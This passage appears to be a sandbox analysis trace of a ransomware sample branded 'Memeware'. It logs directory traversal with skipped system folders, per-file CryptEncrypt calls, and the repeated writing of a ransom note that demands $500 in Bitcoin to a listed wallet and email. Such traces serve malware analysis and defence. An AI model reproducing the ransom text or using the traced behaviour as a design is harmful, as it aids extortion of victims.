lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.044] lstrcmpiW (lpString1="sql2950.tmp", lpString2="Windows") returned -1 [0071.044] lstrcmpiW (lpString1="sql2950.tmp", lpString2="Program Files") returned 1 [0071.044] lstrcmpiW (lpString1="sql2950.tmp", lpString2="Program Files (x86)") returned 1 [0071.044] lstrcmpiW (lpString1="sql2950.tmp", lpString2="$Recycle.bin") returned 1 
[0071.044] lstrcmpiW (lpString1="sql2950.tmp", lpString2="System Volume Information") returned -1 [0071.044] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql2950.tmp") returned 49 [0071.044] StrStrIW (lpFirst="sql2950.tmp", lpSrch=".protected") returned 0x0 [0071.044] lstrcmpW (lpString1="sql2950.tmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.044] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.044] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.044] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql2950.tmp" (normalized: "c:\\programdata\\microsoft\\rac\\temp\\sql2950.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.045] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.045] lstrcmpiW (lpString1="sql2A2C.tmp", lpString2="Windows") returned -1 [0071.045] lstrcmpiW (lpString1="sql2A2C.tmp", lpString2="Program Files") returned 1 [0071.045] lstrcmpiW (lpString1="sql2A2C.tmp", lpString2="Program Files (x86)") returned 1 [0071.045] lstrcmpiW (lpString1="sql2A2C.tmp", lpString2="$Recycle.bin") returned 1 [0071.045] lstrcmpiW (lpString1="sql2A2C.tmp", lpString2="System Volume Information") returned -1 [0071.045] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql2A2C.tmp") returned 49 [0071.045] StrStrIW (lpFirst="sql2A2C.tmp", lpSrch=".protected") returned 0x0 [0071.045] lstrcmpW (lpString1="sql2A2C.tmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.045] CryptGenRandom (in: 
hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.045] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.045] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql2A2C.tmp" (normalized: "c:\\programdata\\microsoft\\rac\\temp\\sql2a2c.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.045] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0071.045] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0071.045] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\RESTORE_FILES.txt") returned 55 [0071.045] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\rac\\temp\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0071.046] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.046] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0071.047] lstrlenA (lpString="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") returned 684 [0071.047] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0071.047] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.047] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0071.047] CloseHandle (hObject=0xb4) returned 1 [0071.047] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0071.047] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0071.047] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\RESTORE_FILES.txt") returned 50 [0071.047] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\rac\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0071.062] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.062] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0071.063] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0071.063] WriteFile (in: hFile=0xa4, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0071.063] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.063] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0071.063] CloseHandle (hObject=0xa4) returned 1 [0071.064] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0071.064] lstrcmpiW (lpString1="Search", lpString2="Windows") returned -1 [0071.064] lstrcmpiW (lpString1="Search", lpString2="Program Files") returned 1 [0071.064] lstrcmpiW (lpString1="Search", lpString2="Program Files (x86)") returned 1 [0071.064] lstrcmpiW (lpString1="Search", lpString2="$Recycle.bin") returned 1 [0071.064] lstrcmpiW (lpString1="Search", lpString2="System Volume Information") returned -1 [0071.064] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search") returned 35 [0071.064] lstrcmpW (lpString1="Search", lpString2=".") returned 1 [0071.064] lstrcmpW (lpString1="Search", lpString2="..") returned 1 [0071.064] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\*") returned 37 [0071.064] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0071.065] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.065] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.065] 
lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.065] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.065] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.065] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\.") returned 37 [0071.065] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.065] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.065] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.065] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.065] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.065] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.065] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.065] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\..") returned 38 [0071.065] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.065] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.065] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.065] lstrcmpiW (lpString1="Data", lpString2="Windows") returned -1 [0071.065] lstrcmpiW (lpString1="Data", lpString2="Program Files") returned -1 [0071.065] lstrcmpiW (lpString1="Data", lpString2="Program Files (x86)") returned -1 [0071.065] lstrcmpiW (lpString1="Data", lpString2="$Recycle.bin") returned 1 [0071.065] lstrcmpiW (lpString1="Data", lpString2="System Volume Information") returned -1 [0071.065] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data") returned 40 [0071.066] lstrcmpW (lpString1="Data", lpString2=".") returned 1 [0071.066] 
lstrcmpW (lpString1="Data", lpString2="..") returned 1 [0071.066] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\*") returned 42 [0071.066] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0071.066] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.066] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.066] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.066] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.066] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.066] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\.") returned 42 [0071.066] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.066] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.066] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.066] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.066] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.066] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.066] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.066] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\..") returned 43 [0071.066] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.066] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.066] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.066] lstrcmpiW (lpString1="Applications", lpString2="Windows") returned -1 
[0071.066] lstrcmpiW (lpString1="Applications", lpString2="Program Files") returned -1 [0071.066] lstrcmpiW (lpString1="Applications", lpString2="Program Files (x86)") returned -1 [0071.066] lstrcmpiW (lpString1="Applications", lpString2="$Recycle.bin") returned 1 [0071.066] lstrcmpiW (lpString1="Applications", lpString2="System Volume Information") returned -1 [0071.066] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications") returned 53 [0071.066] lstrcmpW (lpString1="Applications", lpString2=".") returned 1 [0071.067] lstrcmpW (lpString1="Applications", lpString2="..") returned 1 [0071.067] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\*") returned 55 [0071.067] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0071.275] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.275] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.275] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.275] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.275] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.275] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\.") returned 55 [0071.275] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.275] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0071.275] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.275] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.275] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") 
returned -1 [0071.275] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.275] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.275] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\..") returned 56 [0071.275] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.275] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.275] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0071.275] lstrcmpiW (lpString1="Windows", lpString2="Windows") returned 0 [0071.275] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0071.276] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0071.276] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\RESTORE_FILES.txt") returned 71 [0071.276] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0071.276] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.276] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0071.277] lstrlenA (lpString="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") returned 684 [0071.277] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0071.277] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.277] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0071.277] CloseHandle (hObject=0xd4) returned 1 [0071.277] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.277] lstrcmpiW (lpString1="Temp", lpString2="Windows") returned -1 [0071.277] lstrcmpiW (lpString1="Temp", lpString2="Program Files") returned 1 [0071.277] lstrcmpiW (lpString1="Temp", lpString2="Program Files (x86)") returned 1 [0071.277] lstrcmpiW (lpString1="Temp", lpString2="$Recycle.bin") returned 1 [0071.277] lstrcmpiW (lpString1="Temp", lpString2="System Volume Information") returned 1 [0071.277] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp") returned 45 [0071.277] lstrcmpW (lpString1="Temp", lpString2=".") returned 1 [0071.277] lstrcmpW (lpString1="Temp", lpString2="..") returned 1 [0071.277] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\*") returned 47 [0071.277] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0071.278] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.278] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.278] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.278] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.278] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.278] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\.") returned 47 [0071.278] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.278] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0071.278] lstrcmpiW 
(lpString1="..", lpString2="Windows") returned -1 [0071.278] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.278] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.278] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.278] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.278] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\..") returned 48 [0071.278] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.278] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.278] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0071.278] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0071.278] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\RESTORE_FILES.txt") returned 63 [0071.278] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\search\\data\\temp\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0071.401] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.401] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0071.401] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0071.401] WriteFile (in: hFile=0xd4, 
